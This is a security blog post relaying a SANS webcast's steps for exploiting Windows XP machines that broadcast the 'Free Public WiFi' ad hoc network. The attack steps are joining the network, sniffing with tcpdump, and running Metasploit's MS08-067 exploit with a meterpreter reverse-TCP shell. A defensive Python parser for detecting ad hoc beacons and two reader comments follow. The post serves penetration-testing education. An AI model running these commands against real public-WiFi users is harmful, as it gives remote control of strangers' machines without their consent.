Exploiting “Free Public WiFi”


A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP or brute-forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.

My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly used public WiFi areas. Apparently this is the default name for ad hoc networks that are created by Windows XP SP2. Obviously this gets us excited (MS08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:

  • Connect to the ad hoc network
# iwconfig wlan1 essid "Free Public WiFi" mode adhoc
  • Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
# tcpdump -ni wlan1 -s0 -nt
  • Configure your IP (for the reverse shell to shovel back to)
# ifconfig wlan1 netmask
  • Own It
# msfconsole
# use exploit/windows/smb/ms08_067_netapi
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LPORT 9999
# set RHOST
# set LHOST
# exploit

Pretty straightforward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! It's fantastic!
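
The defender's side of the same observation, as an added example that is not from the original post or the SANS webcast: a Python parser that reads raw 802.11 beacon and probe-response frames and reports stations advertising an ad hoc (IBSS) network, with the SSID above on a watch list. It assumes frames with the radiotap header already stripped; the function names and the sample frames are constructed for illustration.

```python
import struct

IBSS = 0x0002     # capability bit 1: sender is an ad hoc (IBSS) station
PRIVACY = 0x0010  # capability bit 4: encryption required

def parse_beacon(frame):
    """Parse a beacon or probe response (radiotap header already stripped)."""
    if len(frame) < 36:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype not in (5, 8):   # management: probe resp, beacon
        return None
    (cap,) = struct.unpack_from("<H", frame, 34)  # after timestamp + interval
    ssid, pos = "", 36
    while pos + 2 <= len(frame):              # walk tagged parameters
        tag, length = frame[pos], frame[pos + 1]
        body = frame[pos + 2:pos + 2 + length]
        if len(body) < length:                # truncated element: stop
            break
        if tag == 0:                          # SSID element
            ssid = body.decode("utf-8", "replace")
            break
        pos += 2 + length
    return {"station": frame[10:16].hex(":"), "ssid": ssid,
            "adhoc": bool(cap & IBSS), "open": not cap & PRIVACY}

def adhoc_findings(frames, watch=("Free Public WiFi",)):
    """Return ad hoc advertisers; 'watched' marks SSIDs on the watch list."""
    out = []
    for f in frames:
        info = parse_beacon(f)
        if info and info["adhoc"]:
            info["watched"] = info["ssid"] in watch
            out.append(info)
    return out

def make_beacon(ssid, cap, mac):
    """Build a constructed sample beacon for the demo below."""
    hdr = b"\x80\x00\x00\x00" + b"\xff" * 6 + mac + mac + b"\x00\x00"
    fixed = b"\x00" * 8 + struct.pack("<HH", 100, cap)
    return hdr + fixed + bytes([0, len(ssid)]) + ssid.encode() + b"\x01\x01\x82"

SAMPLES = [  # constructed frames, not captured traffic
    make_beacon("Free Public WiFi", IBSS, bytes.fromhex("02aabbccdd01")),
    make_beacon("CorpNet", 0x0001 | PRIVACY, bytes.fromhex("02aabbccdd02")),
]

if __name__ == "__main__":
    for finding in adhoc_findings(SAMPLES):
        print(finding)
```

The reported station address is the transmitter's MAC, which is what you need to locate the machine and remove the ad hoc profile.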


  1. smartass says:

    There is a typo in the 2nd ifconfig command:
    you set your IP to 196… but it should read 169.

    You may correct your post and delete this comment if you wish.

  2. PT says:

    So I decided to help Free Public Wifi along. My home network SSID is now “Free Public WiFi” :-)
